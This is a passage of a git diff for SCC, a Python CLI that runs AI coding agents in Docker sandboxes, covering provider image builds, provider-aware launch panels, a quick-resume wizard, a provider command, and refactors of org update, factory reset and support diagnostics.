+ +_IMAGE_CHECK_TIMEOUT = 10 +_IMAGE_BUILD_TIMEOUT = 30 * 60 + + +def ensure_provider_image( + provider_id: str, + *, + console: Console, + non_interactive: bool, + show_notice: Callable[[str, str, str], None], +) -> None: + """Ensure the selected provider image exists locally. + + Interactive flows auto-build the missing image from SCC's bundled Dockerfile. + Non-interactive flows fail fast with the exact build command. + """ + spec = get_runtime_spec(provider_id) + if _provider_image_exists(spec.image_ref): + return + + build_command = get_provider_build_command(provider_id) + build_command_str = shlex.join(build_command) + + if non_interactive: + raise ProviderImageMissingError( + provider_id=provider_id, + image_ref=spec.image_ref, + suggested_action=f"Build the image first:\n {build_command_str}", + ) + + show_notice( + f"Preparing {spec.display_name}", + ( + f"The local {spec.display_name} image is not available yet.\n\n" + "SCC will build it now from the bundled Dockerfile before launch continues." + ), + "This usually happens only the first time or after an SCC reset.", + ) + _build_provider_image(provider_id, console=console) + + +def get_provider_build_command(provider_id: str) -> list[str]: + """Return the canonical docker build command for a provider image.""" + spec = get_runtime_spec(provider_id) + build_context = _provider_build_context(provider_id) + return ["docker", "build", "-t", spec.image_ref, str(build_context)] + + +def _provider_build_context(provider_id: str) -> Path: + """Return the absolute Docker build context for a provider image.""" + repo_root = Path(__file__).resolve().parents[4] + return repo_root / "images" / f"scc-agent-{provider_id}" + + +def _provider_image_exists(image_ref: str) -> bool: + """Return whether the provider image is already present locally.""" + result = subprocess.run( + ["docker", "image", "inspect", image_ref], + capture_output=True, + text=True, + timeout=_IMAGE_CHECK_TIMEOUT, + check=False, + ) + if result.returncode == 0: + return True + + stderr = (result.stderr or "").lower() + stdout = (result.stdout or "").lower() + missing_markers = ("no such image", "no such object", "not found") + if any(marker in stderr for marker in missing_markers) or any( + marker in stdout for marker in missing_markers + ): + return False + return False + + +def _build_provider_image(provider_id: str, *, console: Console) -> None: + """Build the provider image from SCC's local Dockerfile.""" + spec = get_runtime_spec(provider_id) + build_command = get_provider_build_command(provider_id) + build_command_str = shlex.join(build_command) + build_context = _provider_build_context(provider_id) + + with Status( + f"[cyan]Building {spec.display_name} image...[/cyan]", + console=console, + spinner=Spinners.DOCKER, + ): + result = subprocess.run( + build_command, + capture_output=True, + text=True, + timeout=_IMAGE_BUILD_TIMEOUT, + check=False, + cwd=build_context.parent.parent, + ) + + if result.returncode == 0: + return + + raise ProviderImageBuildError( + provider_id=provider_id, + image_ref=spec.image_ref, + build_command=build_command_str, + command=build_command_str, + stderr=result.stderr, + ) diff --git a/src/scc_cli/commands/launch/render.py b/src/scc_cli/commands/launch/render.py index 262dd77..7f0b054 100644 --- a/src/scc_cli/commands/launch/render.py +++ b/src/scc_cli/commands/launch/render.py @@ -15,6 +15,7 @@ from ... import git from ...cli_common import MAX_DISPLAY_PATH_LENGTH, PATH_TRUNCATE_LENGTH, console, err_console +from ...panels import create_info_panel from ...theme import Indicators from ...ui.chrome import print_with_layout @@ -56,6 +57,7 @@ def build_dry_run_data( mount_root: Path | None = None, container_workdir: str | None = None, resolution_reason: str | None = None, + provider_id: str | None = None, ) -> dict[str, Any]: """ Build dry run data showing resolved configuration. @@ -82,10 +84,11 @@ def build_dry_run_data( if org_config and team: from ...application.compute_effective_config import compute_effective_config + from ...ports.config_models import NormalizedOrgConfig workspace_for_project = None if project_config is not None else workspace_path effective = compute_effective_config( - org_config, + NormalizedOrgConfig.from_dict(org_config), team, project_config=project_config, workspace_path=workspace_for_project, @@ -112,6 +115,7 @@ def build_dry_run_data( "mount_root": str(effective_mount), "container_workdir": effective_cw, "team": team, + "provider_id": provider_id, "plugins": plugins, "blocked_items": blocked_items, "network_policy": network_policy, @@ -126,6 +130,7 @@ def show_launch_panel( session_name: str | None, branch: str | None, is_resume: bool, + display_name: str = "Claude Code", ) -> None: """Display launch info panel with session details. @@ -135,6 +140,7 @@ def show_launch_panel( session_name: Optional session name for identification. branch: Current git branch, or None if not in a git repo. is_resume: True if resuming an existing container. + display_name: Provider display name for the panel title. """ grid = Table.grid(padding=(0, 2)) grid.add_column(style="dim", no_wrap=True) @@ -160,7 +166,7 @@ def show_launch_panel( panel = Panel( grid, - title="[bold green]Launching Claude Code[/bold green]", + title=f"[bold green]Launching {display_name}[/bold green]", border_style="green", padding=(0, 1), ) @@ -173,6 +179,13 @@ def show_launch_panel( console.print() +def show_auth_bootstrap_panel(title: str, content: str, subtitle: str = "") -> None: + """Display an informational panel before an interactive auth bootstrap.""" + console.print() + print_with_layout(console, create_info_panel(title, content, subtitle), constrain=True) + console.print() + + def show_dry_run_panel(data: dict[str, Any]) -> None: """Display dry run configuration preview. @@ -256,7 +269,10 @@ def show_dry_run_panel(data: dict[str, Any]) -> None: console.print() -def show_launch_context_panel(ctx: LaunchContext) -> None: +def show_launch_context_panel( + ctx: LaunchContext, + display_name: str = "Claude Code", +) -> None: """Display enhanced launch context panel with path information. Shows: @@ -265,6 +281,10 @@ def show_launch_context_panel(ctx: LaunchContext) -> None: - Mount root (MR) only if different from WR (worktree expansion) - Container workdir (CW) - Team / branch / session / mode + + Args: + ctx: Launch context with path and session information. + display_name: Provider display name for the panel title. """ grid = Table.grid(padding=(0, 2)) grid.add_column(style="dim", no_wrap=True) @@ -305,7 +325,7 @@ def show_launch_context_panel(ctx: LaunchContext) -> None: panel = Panel( grid, - title="[bold green]Launching Claude Code[/bold green]", + title=f"[bold green]Launching {display_name}[/bold green]", border_style="green", padding=(0, 1), ) diff --git a/src/scc_cli/commands/launch/sandbox.py b/src/scc_cli/commands/launch/sandbox.py index 1ddde9b..f218516 100644 --- a/src/scc_cli/commands/launch/sandbox.py +++ b/src/scc_cli/commands/launch/sandbox.py @@ -31,6 +31,7 @@ def launch_sandbox( should_continue_session: bool, fresh: bool, plugin_settings: dict[str, Any] | None = None, + display_name: str = "Claude Code", ) -> None: """ Execute the Docker sandbox with all configurations applied. @@ -48,6 +49,7 @@ def launch_sandbox( current_branch: Git branch name. should_continue_session: Whether to continue existing session. fresh: Force new container. + display_name: Provider display name for the launch panel title. plugin_settings: Plugin settings dict to inject into container HOME. Contains extraKnownMarketplaces and enabledPlugins with absolute paths pointing to the bind-mounted workspace. @@ -58,18 +60,20 @@ def launch_sandbox( env_vars = None if org_config and team: + from scc_cli.bootstrap import merge_mcp_servers + from ...application.compute_effective_config import compute_effective_config - from ...claude_adapter import merge_mcp_servers from ...core.enums import NetworkPolicy from ...core.network_policy import collect_proxy_env + from ...ports.config_models import NormalizedOrgConfig effective_config = compute_effective_config( - org_config=org_config, + org_config=NormalizedOrgConfig.from_dict(org_config), team_name=team, workspace_path=workspace_path or mount_path, ) plugin_settings = merge_mcp_servers(plugin_settings, effective_config) - if effective_config.network_policy == NetworkPolicy.CORP_PROXY_ONLY.value: + if effective_config.network_policy == NetworkPolicy.WEB_EGRESS_ENFORCED.value: env_vars = collect_proxy_env() # Prepare sandbox volume for credential persistence @@ -96,6 +100,7 @@ def launch_sandbox( session_name=session_name, container_name=container_name, branch=current_branch, + provider_id="claude", # Legacy sandbox path is always Claude ) # Record context for quick resume feature # Determine repo root (may be same as workspace for non-worktrees) @@ -143,6 +148,7 @@ def launch_sandbox( session_name=session_name, branch=current_branch, is_resume=is_resume, + display_name=display_name, ) # Pass org_config for safety-net policy injection (mounted read-only) diff --git a/src/scc_cli/commands/launch/team_settings.py b/src/scc_cli/commands/launch/team_settings.py index 7f89bb0..e1eefa7 100644 --- a/src/scc_cli/commands/launch/team_settings.py +++ b/src/scc_cli/commands/launch/team_settings.py @@ -2,6 +2,8 @@ from __future__ import annotations +from typing import Any + import typer from rich.status import Status @@ -11,10 +13,9 @@ from ...panels import create_warning_panel from ...theme import Spinners from ...ui.chrome import print_with_layout -from .flow_types import UserConfig -def _configure_team_settings(team: str | None, cfg: UserConfig) -> None: +def _configure_team_settings(team: str | None, cfg: dict[str, Any]) -> None: """Validate team profile exists. NOTE: Plugin settings are now sourced ONLY from workspace settings.local.json diff --git a/src/scc_cli/commands/launch/wizard_resume.py b/src/scc_cli/commands/launch/wizard_resume.py new file mode 100644 index 0000000..dab7f99 --- /dev/null +++ b/src/scc_cli/commands/launch/wizard_resume.py @@ -0,0 +1,321 @@ +"""Typed quick-resume helper flows for the interactive start wizard.""" + +from __future__ import annotations + +from pathlib import Path + +from ...application.launch import ( + QuickResumeDismissed, + QuickResumeViewModel, + StartWizardContext, + StartWizardState, + StartWizardStep, + WorkspaceSource, + apply_start_wizard_event, + build_cross_team_resume_prompt, + build_quick_resume_prompt, +) +from ...cli_common import console +from ...contexts import WorkContext, load_recent_contexts, normalize_path +from ...ui.wizard import ( + BACK, + StartWizardAction, + StartWizardAnswer, + StartWizardAnswerKind, + render_start_wizard_prompt, +) +from .flow_types import ( + QuickResumeResolution, + WizardResumeContext, + WorkspaceResumeResolution, + filter_contexts_for_workspace, + reset_for_team_switch, + set_team_context, + set_workspace, +) + + +class ResumeWizardError(ValueError): + """Raised when a wizard resume helper receives an impossible answer shape.""" + + +def _require_selected_context(answer: StartWizardAnswer) -> WorkContext: + if answer.kind is not StartWizardAnswerKind.SELECTED or not isinstance( + answer.value, WorkContext + ): + raise ResumeWizardError("Quick resume expected a selected WorkContext answer.") + return answer.value + + +def _require_confirmation_value(answer: StartWizardAnswer) -> bool: + if answer.kind is not StartWizardAnswerKind.SELECTED or not isinstance(answer.value, bool): + raise ResumeWizardError("Cross-team resume confirmation expected a boolean answer.") + return answer.value + + +def _confirm_cross_team_resume(selected_context: WorkContext, *, current_team: str | None) -> bool: + if ( + current_team is None + or selected_context.team is None + or selected_context.team == current_team + ): + return True + + console.print() + prompt = build_cross_team_resume_prompt(selected_context.team) + confirm_answer = render_start_wizard_prompt(prompt, console=console) + return _require_confirmation_value(confirm_answer) + + +def _load_workspace_contexts( + workspace: Path, + *, + team_filter: str | None, + standalone_mode: bool, +) -> list[WorkContext]: + contexts = filter_contexts_for_workspace( + workspace, + load_recent_contexts(limit=30, team_filter=team_filter), + ) + if not standalone_mode: + return contexts + return [ctx for ctx in contexts if ctx.team is None] + + +def prompt_workspace_quick_resume( + workspace: str, + *, + team: str | None, + render_context: WizardResumeContext, + quick_resume_dismissed: bool = False, +) -> StartWizardAnswer | None: + """Prompt for quick resume within a selected workspace, if matching contexts exist.""" + if quick_resume_dismissed: + return None + + normalized_workspace = normalize_path(workspace) + team_filter = None if render_context.standalone_mode else team if team else "all" + workspace_contexts = _load_workspace_contexts( + normalized_workspace, + team_filter=team_filter, + standalone_mode=render_context.standalone_mode, + ) + if not workspace_contexts: + return None + + console.print() + workspace_show_all_teams = False + while True: + displayed_contexts = workspace_contexts + if workspace_show_all_teams: + displayed_contexts = _load_workspace_contexts( + normalized_workspace, + team_filter="all", + standalone_mode=render_context.standalone_mode, + ) + + qr_subtitle = "Existing sessions found for this workspace" + if workspace_show_all_teams: + qr_subtitle = "All teams for this workspace — resuming uses that team's plugins" + + quick_resume_view = QuickResumeViewModel( + title=f"Resume session in {Path(workspace).name}?", + subtitle=qr_subtitle, + context_label="All teams" + if workspace_show_all_teams + else f"Team: {team or render_context.active_team_label}", + standalone=render_context.standalone_mode, + effective_team=team or render_context.effective_team, + contexts=displayed_contexts, + current_branch=render_context.current_branch, + ) + prompt = build_quick_resume_prompt(view_model=quick_resume_view) + answer = render_start_wizard_prompt( + prompt, + console=console, + allow_back=True, + standalone=render_context.standalone_mode, + context_label=quick_resume_view.context_label, + current_branch=render_context.current_branch, + effective_team=team or render_context.effective_team, + ) + + if answer.kind in {StartWizardAnswerKind.CANCELLED, StartWizardAnswerKind.BACK}: + return answer + if answer.value is StartWizardAction.SWITCH_TEAM: + return answer + if answer.value is StartWizardAction.NEW_SESSION: + console.print() + return answer + if answer.value is StartWizardAction.TOGGLE_ALL_TEAMS: + if render_context.standalone_mode: + console.print("[dim]All teams view is unavailable in standalone mode[/dim]") + console.print() + continue + workspace_show_all_teams = not workspace_show_all_teams + continue + + selected_context = _require_selected_context(answer) + current_team = team or render_context.effective_team + if not _confirm_cross_team_resume(selected_context, current_team=current_team): + continue + return answer + + +def resolve_workspace_resume( + state: StartWizardState, + workspace: str, + *, + workspace_source: WorkspaceSource, + render_context: WizardResumeContext, + show_all_teams: bool, + quick_resume_dismissed: bool = False, +) -> tuple[WorkspaceResumeResolution, bool]: + """Resolve workspace-scoped quick resume and return next state or exit result.""" + resume_answer = prompt_workspace_quick_resume( + workspace, + team=state.context.team, + render_context=render_context, + quick_resume_dismissed=quick_resume_dismissed, + ) + + if resume_answer is None: + return ( + set_workspace( + state, + workspace, + workspace_source, + standalone_mode=render_context.standalone_mode, + team_override=render_context.team_override, + effective_team=render_context.effective_team, + ), + show_all_teams, + ) + + if resume_answer.kind is StartWizardAnswerKind.CANCELLED: + return ((None, None, None, None), show_all_teams) + if resume_answer.kind is StartWizardAnswerKind.BACK: + return (None, show_all_teams) + + if resume_answer.value is StartWizardAction.SWITCH_TEAM: + reset_state = reset_for_team_switch(state) + return (set_team_context(reset_state, render_context.team_override), False) + + if resume_answer.value is StartWizardAction.NEW_SESSION: + return ( + set_workspace( + state, + workspace, + workspace_source, + standalone_mode=render_context.standalone_mode, + team_override=render_context.team_override, + effective_team=render_context.effective_team, + ), + show_all_teams, + ) + + selected_context = _require_selected_context(resume_answer) + return ( + ( + str(selected_context.worktree_path), + selected_context.team, + selected_context.last_session_id, + None, + ), + show_all_teams, + ) + + +def handle_top_level_quick_resume( + state: StartWizardState, + *, + render_context: WizardResumeContext, + show_all_teams: bool, +) -> tuple[QuickResumeResolution, bool]: + """Resolve the top-level quick resume step and return next state or exit result.""" + team_filter = "all" if show_all_teams else render_context.effective_team + recent_contexts = load_recent_contexts(limit=10, team_filter=team_filter) + + qr_subtitle: str | None = None + if show_all_teams: + qr_context_label = "All teams" + qr_title = "Quick Resume — All Teams" + if recent_contexts: + qr_subtitle = ( + "Showing all teams — resuming uses that team's plugins. Press 'a' to filter." + ) + else: + qr_subtitle = "No sessions yet — start fresh" + else: + qr_context_label = render_context.active_team_context + qr_title = "Quick Resume" + if not recent_contexts: + all_contexts = load_recent_contexts(limit=10, team_filter="all") + team_label = render_context.effective_team or "standalone" + if all_contexts: + qr_subtitle = f"No sessions yet for {team_label}. Press 'a' to show all teams." + else: + qr_subtitle = "No sessions yet — start fresh" + + quick_resume_view = QuickResumeViewModel( + title=qr_title, + subtitle=qr_subtitle, + context_label=qr_context_label, + standalone=render_context.standalone_mode, + effective_team=render_context.effective_team, + contexts=recent_contexts, + current_branch=render_context.current_branch, + ) + prompt = build_quick_resume_prompt(view_model=quick_resume_view) + answer = render_start_wizard_prompt( + prompt, + console=console, + allow_back=render_context.allow_back, + standalone=render_context.standalone_mode, + context_label=qr_context_label, + current_branch=render_context.current_branch, + effective_team=render_context.effective_team, + ) + + if answer.kind is StartWizardAnswerKind.CANCELLED: + return ((None, None, None, None), show_all_teams) + if answer.kind is StartWizardAnswerKind.BACK: + if render_context.allow_back: + return ((BACK, None, None, None), show_all_teams) + return ((None, None, None, None), show_all_teams) + + if answer.value is StartWizardAction.SWITCH_TEAM: + dismissed_state = apply_start_wizard_event(state, QuickResumeDismissed()) + return ( + StartWizardState( + step=StartWizardStep.TEAM_SELECTION, + context=StartWizardContext(team=None), + config=dismissed_state.config, + ), + False, + ) + + if answer.value is StartWizardAction.NEW_SESSION: + console.print() + return (apply_start_wizard_event(state, QuickResumeDismissed()), show_all_teams) + + if answer.value is StartWizardAction.TOGGLE_ALL_TEAMS: + if render_context.standalone_mode: + console.print("[dim]All teams view is unavailable in standalone mode[/dim]") + console.print() + return (state, show_all_teams) + return (state, not show_all_teams) + + selected_context = _require_selected_context(answer) + if not _confirm_cross_team_resume(selected_context, current_team=render_context.effective_team): + return (state, show_all_teams) + + return ( + ( + str(selected_context.worktree_path), + selected_context.team, + selected_context.last_session_id, + None, + ), + show_all_teams, + ) diff --git a/src/scc_cli/commands/org/update_cmd.py b/src/scc_cli/commands/org/update_cmd.py index 3767d07..acf52ba 100644 --- a/src/scc_cli/commands/org/update_cmd.py +++ b/src/scc_cli/commands/org/update_cmd.py @@ -18,6 +18,140 @@ from ._builders import _parse_config_source, build_update_data +def _update_single_team( + team: str, + profiles: dict[str, Any], + org_config: dict[str, Any], + json_output: bool, +) -> list[dict[str, Any]]: + """Fetch and update a single federated team config.""" + if team not in profiles: + if json_output: + with json_output_mode(): + envelope = build_envelope( + Kind.ORG_UPDATE, + data=build_update_data(org_config), + ok=False, + errors=[f"Team '{team}' not found in organization config"], + ) + print_json(envelope) + raise typer.Exit(EXIT_CONFIG) + console.print( + create_error_panel( + "Team Not Found", + f"Team '{team}' not found in organization config.", + hint=f"Available teams: {', '.join(profiles.keys())}", + ) + ) + raise typer.Exit(EXIT_CONFIG) + + profile = profiles[team] + config_source_dict = profile.get("config_source") + + if config_source_dict is None: + team_results = [{"team": team, "success": True, "inline": True}] + if json_output: + with json_output_mode(): + data = build_update_data(org_config, team_results) + envelope = build_envelope(Kind.ORG_UPDATE, data=data) + print_json(envelope) + raise typer.Exit(0) + console.print( + create_warning_panel( + "Inline Team", + f"Team '{team}' is not federated (inline config).", + hint="Inline teams don't have external configs to refresh.", + ) + ) + raise typer.Exit(0) + + try: + config_source = _parse_config_source(config_source_dict) + result = fetch_team_config(config_source, team) + if result.success: + return [{"team": team, "success": True, "commit_sha": result.commit_sha}] + team_results = [{"team": team, "success": False, "error": result.error}] + if json_output: + with json_output_mode(): + data = build_update_data(org_config, team_results) + envelope = build_envelope( + Kind.ORG_UPDATE, + data=data, + ok=False, + errors=[f"Failed to fetch team config: {result.error}"], + ) + print_json(envelope) + raise typer.Exit(EXIT_CONFIG) + console.print( + create_error_panel( + "Team Update Failed", + f"Failed to fetch config for team '{team}'.", + hint=str(result.error), + ) + ) + raise typer.Exit(EXIT_CONFIG) + except typer.Exit: + raise + except Exception as e: + if json_output: + with json_output_mode(): + envelope = build_envelope( + Kind.ORG_UPDATE, + data=build_update_data(org_config), + ok=False, + errors=[f"Error parsing config source: {e}"], + ) + print_json(envelope) + raise typer.Exit(EXIT_CONFIG) + console.print(create_error_panel("Config Error", f"Error parsing config source: {e}")) + raise typer.Exit(EXIT_CONFIG) + + +def _update_all_teams( + profiles: dict[str, Any], + org_config: dict[str, Any], + json_output: bool, +) -> list[dict[str, Any]]: + """Fetch and update all federated team configs.""" + federated_teams = [ + (name, profile) + for name, profile in profiles.items() + if profile.get("config_source") is not None + ] + + if not federated_teams: + if json_output: + with json_output_mode(): + data = build_update_data(org_config, []) + envelope = build_envelope(Kind.ORG_UPDATE, data=data) + print_json(envelope) + raise typer.Exit(0) + console.print( + create_warning_panel( + "No Federated Teams", + "No federated teams found in organization config.", + hint="All teams use inline configuration.", + ) + ) + raise typer.Exit(0) + + team_results: list[dict[str, Any]] = [] + for team_name, profile in federated_teams: + config_source_dict = profile["config_source"] + try: + config_source = _parse_config_source(config_source_dict) + result = fetch_team_config(config_source, team_name) + if result.success: + team_results.append( + {"team": team_name, "success": True, "commit_sha": result.commit_sha} + ) + else: + team_results.append({"team": team_name, "success": False, "error": result.error}) + except Exception as e: + team_results.append({"team": team_name, "success": False, "error": str(e)}) + return team_results + + @handle_errors def org_update_cmd( team: str | None = typer.Option( @@ -116,160 +250,13 @@ def org_update_cmd( # Get profiles from org config profiles = org_config.get("profiles", {}) - # Handle --team option (single team update) + # Handle --team or --all-teams options team_results: list[dict[str, Any]] | None = None if team is not None: - # Validate team exists - if team not in profiles: - if json_output: - with json_output_mode(): - envelope = build_envelope( - Kind.ORG_UPDATE, - data=build_update_data(org_config), - ok=False, - errors=[f"Team '{team}' not found in organization config"], - ) - print_json(envelope) - raise typer.Exit(EXIT_CONFIG) - console.print( - create_error_panel( - "Team Not Found", - f"Team '{team}' not found in organization config.", - hint=f"Available teams: {', '.join(profiles.keys())}", - ) - ) - raise typer.Exit(EXIT_CONFIG) + team_results = _update_single_team(team, profiles, org_config, json_output) - profile = profiles[team] - config_source_dict = profile.get("config_source") - - # Check if team is federated - if config_source_dict is None: - team_results = [{"team": team, "success": True, "inline": True}] - if json_output: - with json_output_mode(): - data = build_update_data(org_config, team_results) - envelope = build_envelope(Kind.ORG_UPDATE, data=data) - print_json(envelope) - raise typer.Exit(0) - console.print( - create_warning_panel( - "Inline Team", - f"Team '{team}' is not federated (inline config).", - hint="Inline teams don't have external configs to refresh.", - ) - ) - raise typer.Exit(0) - - # Fetch team config - try: - config_source = _parse_config_source(config_source_dict) - result = fetch_team_config(config_source, team) - if result.success: - team_results = [ - { - "team": team, - "success": True, - "commit_sha": result.commit_sha, - } - ] - else: - team_results = [ - { - "team": team, - "success": False, - "error": result.error, - } - ] - if json_output: - with json_output_mode(): - data = build_update_data(org_config, team_results) - envelope = build_envelope( - Kind.ORG_UPDATE, - data=data, - ok=False, - errors=[f"Failed to fetch team config: {result.error}"], - ) - print_json(envelope) - raise typer.Exit(EXIT_CONFIG) - console.print( - create_error_panel( - "Team Update Failed", - f"Failed to fetch config for team '{team}'.", - hint=str(result.error), - ) - ) - raise typer.Exit(EXIT_CONFIG) - except Exception as e: - if json_output: - with json_output_mode(): - envelope = build_envelope( - Kind.ORG_UPDATE, - data=build_update_data(org_config), - ok=False, - errors=[f"Error parsing config source: {e}"], - ) - print_json(envelope) - raise typer.Exit(EXIT_CONFIG) - console.print(create_error_panel("Config Error", f"Error parsing config source: {e}")) - raise typer.Exit(EXIT_CONFIG) - - # Handle --all-teams option elif all_teams: - team_results = [] - federated_teams = [ - (name, profile) - for name, profile in profiles.items() - if profile.get("config_source") is not None - ] - - if not federated_teams: - team_results = [] - if json_output: - with json_output_mode(): - data = build_update_data(org_config, team_results) - envelope = build_envelope(Kind.ORG_UPDATE, data=data) - print_json(envelope) - raise typer.Exit(0) - console.print( - create_warning_panel( - "No Federated Teams", - "No federated teams found in organization config.", - hint="All teams use inline configuration.", - ) - ) - raise typer.Exit(0) - - # Fetch all federated team configs - for team_name, profile in federated_teams: - config_source_dict = profile["config_source"] - try: - config_source = _parse_config_source(config_source_dict) - result = fetch_team_config(config_source, team_name) - if result.success: - team_results.append( - { - "team": team_name, - "success": True, - "commit_sha": result.commit_sha, - } - ) - else: - team_results.append( - { - "team": team_name, - "success": False, - "error": result.error, - } - ) - except Exception as e: - team_results.append( - { - "team": team_name, - "success": False, - "error": str(e), - } - ) + team_results = _update_all_teams(profiles, org_config, json_output) # Build output data data = build_update_data(org_config, team_results) diff --git a/src/scc_cli/commands/profile.py b/src/scc_cli/commands/profile.py index c16fb17..5f2c216 100644 --- a/src/scc_cli/commands/profile.py +++ b/src/scc_cli/commands/profile.py @@ -1,6 +1,12 @@ -"""Personal profile commands. +"""Personal profile commands (Claude provider only). Manage per-project personal settings layered on top of team config. + +This module manages Claude-specific personal settings via +``.claude/settings.local.json``. The hardcoded references to the Claude +settings path are intentional — this module operates exclusively within +the Claude provider surface. Future provider generalisation tracked +separately. """ from __future__ import annotations @@ -44,6 +50,7 @@ write_workspace_mcp, write_workspace_settings, ) +from ..marketplace.managed import load_managed_state from ..subprocess_utils import run_command from ..ui.gate import is_interactive_allowed @@ -363,7 +370,12 @@ def apply_cmd( diff_settings = build_diff_text( f"settings.local.json ({profile.repo_id})", existing_settings, - merge_personal_settings(ws_path, existing_settings, profile_settings), + merge_personal_settings( + ws_path, + existing_settings, + profile_settings, + managed_state_loader=load_managed_state, + ), ) if diff_settings: console.print(diff_settings) @@ -383,7 +395,9 @@ def apply_cmd( ) raise typer.Exit(EXIT_USAGE) - merged_settings = merge_personal_settings(ws_path, existing_settings, profile_settings) + merged_settings = merge_personal_settings( + ws_path, existing_settings, profile_settings, managed_state_loader=load_managed_state + ) merged_mcp = merge_personal_mcp(existing_mcp, profile_mcp) if merged_settings == existing_settings and merged_mcp == existing_mcp: diff --git a/src/scc_cli/commands/provider.py b/src/scc_cli/commands/provider.py new file mode 100644 index 0000000..692e64b --- /dev/null +++ b/src/scc_cli/commands/provider.py @@ -0,0 +1,46 @@ +"""Provider management commands for SCC CLI.""" + +from __future__ import annotations + +import typer + +from .. import config +from ..cli_common import console, handle_errors +from ..core.provider_resolution import KNOWN_PROVIDERS + +provider_app = typer.Typer( + name="provider", + help="Manage agent provider selection.", + no_args_is_help=True, + context_settings={"help_option_names": ["-h", "--help"]}, +) + + +@provider_app.command("show") +@handle_errors +def show() -> None: + """Show the currently selected agent provider.""" + provider = config.get_selected_provider() or "ask" + console.print(provider) + + +@provider_app.command("set") +@handle_errors +def set_provider( + provider: str = typer.Argument(..., help="Provider to set (claude, codex, or ask)"), +) -> None: + """Set the global provider preference.""" + if provider == "ask": + config.set_selected_provider("ask") + console.print("Provider preference set to [bold]ask[/bold]") + return + + if provider not in KNOWN_PROVIDERS: + console.print( + f"[red]Error:[/red] Unknown provider '{provider}'. " + f"Known providers: {', '.join(KNOWN_PROVIDERS)}, ask", + highlight=False, + ) + raise typer.Exit(2) + config.set_selected_provider(provider) + console.print(f"Provider preference set to [bold]{provider}[/bold]") diff --git a/src/scc_cli/commands/reset.py b/src/scc_cli/commands/reset.py index 819172b..c54a3cd 100644 --- a/src/scc_cli/commands/reset.py +++ b/src/scc_cli/commands/reset.py @@ -317,6 +317,66 @@ def _run_interactive_mode() -> None: # ═══════════════════════════════════════════════════════════════════════════════ +# Factory Reset +# ═══════════════════════════════════════════════════════════════════════════════ + + +def _execute_factory_reset( + *, + plan: bool, + yes: bool, + force: bool, + non_interactive: bool, + dry_run: bool, + no_backup: bool, + continue_on_error: bool, + json_output: bool, +) -> None: + """Execute a factory reset (--all flag handler).""" + if plan: + console.print("\n[bold cyan]Factory Reset Preview[/bold cyan]\n") + paths = get_paths() + total_size = 0 + for path in paths: + if path.exists: + console.print(f" • {path.name}: {path.path} ({path.size_human})") + total_size += path.size_bytes + console.print(f"\n Total: {total_size / 1024:.1f} KB") + console.print("\n [dim]This would remove all SCC data.[/dim]") + return + + if not _confirm_factory_reset(yes, force, non_interactive): + raise typer.Exit(EXIT_CANCELLED) + + try: + with MaintenanceLock(): + context = _build_context( + dry_run=dry_run, + create_backup=not no_backup, + continue_on_error=continue_on_error, + ) + factory_results = run_task("factory_reset", context) + if not isinstance(factory_results, list): + factory_results = [factory_results] + + if json_output: + _print_json_results(factory_results) + else: + console.print() + for result in factory_results: + _print_result(result) + console.print() + total_bytes = sum(r.bytes_freed for r in factory_results) + console.print(f"[bold]Total freed: {total_bytes / 1024:.1f} KB[/bold]") + + if not all(r.success for r in factory_results): + raise typer.Exit(1) + + except MaintenanceLockError as e: + console.print(f"[red]Error: {e}[/red]") + raise typer.Exit(1) + + # Main Command # ═══════════════════════════════════════════════════════════════════════════════ @@ -465,50 +525,16 @@ def reset_cmd( # --all overrides individual flags if all_flag: - if plan: - # Show factory reset preview - console.print("\n[bold cyan]Factory Reset Preview[/bold cyan]\n") - paths = get_paths() - total_size = 0 - for path in paths: - if path.exists: - console.print(f" • {path.name}: {path.path} ({path.size_human})") - total_size += path.size_bytes - console.print(f"\n Total: {total_size / 1024:.1f} KB") - console.print("\n [dim]This would remove all SCC data.[/dim]") - return - - if not _confirm_factory_reset(yes, force, non_interactive): - raise typer.Exit(EXIT_CANCELLED) - - try: - with MaintenanceLock(): - context = _build_context( - dry_run=dry_run, - create_backup=not no_backup, - continue_on_error=continue_on_error, - ) - factory_results = run_task("factory_reset", context) - if not isinstance(factory_results, list): - factory_results = [factory_results] - - if json_output: - _print_json_results(factory_results) - else: - console.print() - for result in factory_results: - _print_result(result) - console.print() - total_bytes = sum(r.bytes_freed for r in factory_results) - console.print(f"[bold]Total freed: {total_bytes / 1024:.1f} KB[/bold]") - - if not all(r.success for r in factory_results): - raise typer.Exit(1) - - except MaintenanceLockError as e: - console.print(f"[red]Error: {e}[/red]") - raise typer.Exit(1) - + _execute_factory_reset( + plan=plan, + yes=yes, + force=force, + non_interactive=non_interactive, + dry_run=dry_run, + no_backup=no_backup, + continue_on_error=continue_on_error, + json_output=json_output, + ) return # Build list of operations to perform diff --git a/src/scc_cli/commands/support.py b/src/scc_cli/commands/support.py index 43be07f..e1dca8b 100644 --- a/src/scc_cli/commands/support.py +++ b/src/scc_cli/commands/support.py @@ -1,24 +1,38 @@ """ Provide CLI commands for support and diagnostics. -Generate support bundles with diagnostic information. Include secret -and path redaction for safe sharing. +Generate support bundles with diagnostic information and inspect the +recent launch-audit sink without opening raw JSONL files by hand. """ -from datetime import datetime +from __future__ import annotations + from pathlib import Path import typer +from .. import config +from ..application.launch.audit_log import ( + LaunchAuditDiagnostics, + LaunchAuditEventRecord, + read_launch_audit_diagnostics, +) +from ..application.safety_audit import ( + SafetyAuditDiagnostics, + SafetyAuditEventRecord, + read_safety_audit_diagnostics, +) from ..application.support_bundle import ( - SupportBundleDependencies, SupportBundleRequest, + build_default_support_bundle_dependencies, build_support_bundle_manifest, create_support_bundle, + get_default_support_bundle_path, ) -from ..bootstrap import get_default_adapters from ..cli_common import console, handle_errors from ..output_mode import json_output_mode, print_json, set_pretty_mode +from ..presentation.json.launch_audit_json import build_launch_audit_envelope +from ..presentation.json.safety_audit_json import build_safety_audit_envelope from ..presentation.json.support_json import build_support_bundle_envelope # ───────────────────────────────────────────────────────────────────────────── @@ -33,10 +47,56 @@ ) -def _get_default_bundle_path() -> Path: - """Get default path for support bundle.""" - timestamp = datetime.now().strftime("%Y%m%d-%H%M%S") - return Path.cwd() / f"scc-support-bundle-{timestamp}.zip" +def _render_launch_audit_human(diagnostics: LaunchAuditDiagnostics) -> None: + """Render launch-audit diagnostics for human readers.""" + console.print(f"[bold cyan]Launch audit[/bold cyan]\nSink: {diagnostics.sink_path}") + + if diagnostics.state == "unavailable": + console.print("State: unavailable") + if diagnostics.error: + console.print(f"Error: {diagnostics.error}") + else: + console.print("No launch-audit file exists yet.") + return + + 